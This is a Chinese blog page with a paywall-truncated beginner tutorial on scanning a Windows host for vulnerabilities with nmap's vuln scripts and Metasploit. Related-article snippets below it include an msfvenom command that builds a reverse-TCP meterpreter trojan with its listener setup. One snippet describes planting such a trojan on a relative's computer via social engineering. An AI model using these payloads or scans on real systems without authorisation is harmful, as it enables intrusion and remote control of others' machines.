Kali WIndows 漏洞利用基础篇 (探索目标主机漏洞)

最新推荐文章于 2025-03-17 16:43:24 发布
最新推荐文章于 2025-03-17 16:43:24 发布
阅读量8.7k 收藏 62
点赞数 8
分类专栏: Kali 文章标签: msf nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43504064/article/details/100180991
版权

通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞。因为很多教程只说了用什么漏洞去攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体化在笔记本电脑上)

  • 一.工具介绍

namp 一款可以探测主机的基本信息的扫描工具,数据包中包含扫描主机的开启端口,端口使用的服务,和一些系统信息。
msf一个极为强大的漏洞利用工具不管是系统漏洞,还是软件服务漏洞。MSF基本都有较为强大的漏洞数据库来匹配

  • 二.创建攻击组织,搭建网络实验环境

Kali IP地址 10.117.12.221 (Kali连接的是WIFI)
入侵目标 IP地址 10.117.0.15
本教程给的是跨网段去探测主机漏洞,如果Nmap在扫描网段主机时扫描不到存活主机请设置系统防火墙或者是杀毒软件

  • 通过Nmap专项扫描目标主机存在系统漏洞(只能系统漏洞利用)

打开终端输入 nmap --script = vuln ip (扫描指定IP主机存在的系统漏洞)
因为我要扫描10.117.0.15的目标主机存在的漏洞所以代码是
nmap --script = vuln 10.117.0.15
这时过一会就会出现该系统存在一些漏洞

最低0.47元/天 解锁文章
渗透测试之用Kali2022渗透Windows 10系统
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
01-18 841
1.渗透者IP:192.168.1.35系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.16系统: Windows103.USB无线网卡。
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 1308
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
kali Linux:利用漏洞获取目标主机的IP地址
weixin_58023816的博客
12-10 3349
【代码】kali Linux:利用漏洞获取目标主机的IP地址。
kali漏洞扫描
最新发布
IT技术类博客
03-17 1148
Kali Linux 中扫描目标机器的漏洞时,可以使用多种工具进行不同维度的检测。,可以有效识别目标机器的安全风险。但务必始终遵守网络安全法律法规,仅在授权范围内进行测试。Kali Linux 提供了从基础端口扫描到深度漏洞利用的全套工具链。
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
Kali安全渗透测试实践教程】第5章 漏洞利用
小原的博客
08-06 919
Kali安全渗透测试实践教程】第5章 漏洞利用
vmware条件下使用kali linux虚拟机对windows10进行渗透攻击的记录(学习使用)
wcf2020的博客
11-14 9425
使用kali linux虚拟机对windows10进行渗透攻击的记录 一、安装vmware tools以保证在虚拟机上创建的文件与主机可相互移动: VMware Tools是VMware虚拟机中自带的一种增强工具,是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。只有在VMware虚拟机中安装好了VMware Tools,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的功能,鼠标也可在虚拟机与主机之间自由移动(不用再按ctrl+alt),且虚拟机屏幕也可实现...
[系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
杨秀璋的专栏
12-27 1万+
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,与大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析、漏洞利用、攻防实战等,通过在线笔记和实践操作的形式分享与博友们学习。前文通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程。这文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 1075
上一文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
kali对win10入侵测试
weixin_48900801的博客
03-19 4130
kali 对win10入侵及提权测试 在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、对windows 10入侵测试 环境 攻击机:Kali Linux 2019 ip:192.168.245.143 目标主机Windows 10 ip:192.168.245.133 1.生成exe文件,在目标主机
kali渗透Windows
m0_61680503的博客
04-13 640
运用kali渗透Windows系统打开摄像头和截图
kali渗透测试win10
舌耳的博客
10-29 1万+
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kalimsfconsole msf > use exploit/multi/handler msf exp...
Mybatis接口Mapper内的方法为啥不能重载吗?
程序员麦冬的博客(公众号同名)
09-14 315
动态代理的功能:通过拦截器方法回调,对目标target方法进行增强。 言外之意就是为了增强目标target方法。上面这句话没错,但也不要认为它就是真理,殊不知,动态代理还有投鞭断流的霸权,连目标target都不要的科幻模式。 注:本文默认认为,读者对动态代理的原理是理解的,如果不明白target的含义,难以看懂本文章,建议先理解动态代理。 1. 自定义JDK动态代理之投鞭断流实现自动映射器Mapper 首先定义一个pojo。 public class User { private Integer id
Kali MSF攻击Win10
nlj1860453的博客
01-05 1634
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
Kali渗透Windows服务器
2301_77732591的博客
06-27 646
(2) 目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;
Kali Linux-Metasploit入侵win7/win10系统实验
Nomature的博客
10-29 1058
教学实验、安全测试
漏洞扫描技术
2301_77302602的博客
04-09 1987
漏洞扫描技术实验中,我使用了Kali Linux这个专门用于渗透测试和漏洞评估的操作系统。通过这次实验,我学到了许多关于漏洞扫描的知识和技术。首先,我了解了什么是漏洞扫描。漏洞扫描是指通过扫描目标系统中的漏洞,发现系统中可能存在的安全问题。这些安全问题可以是软件漏洞、配置错误、密码弱点等。漏洞扫描可以帮助我们及早发现并修补系统中存在的安全漏洞,提高系统的安全性。在实验中,我使用了Kali Linux中的一些工具来进行漏洞扫描。其中最常用的工具包括Nmap和OpenVAS。
KaliLinux安全渗透教程:从安装到高级测试
教程详细介绍了Kali Linux的安装、配置、更新和升级,以及如何利用它来进行各种安全测试和漏洞评估。 安装Kali Linux时,可以选择多种方式,如直接安装到硬盘、USB驱动器或者在VMware Workstation上创建虚拟机。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值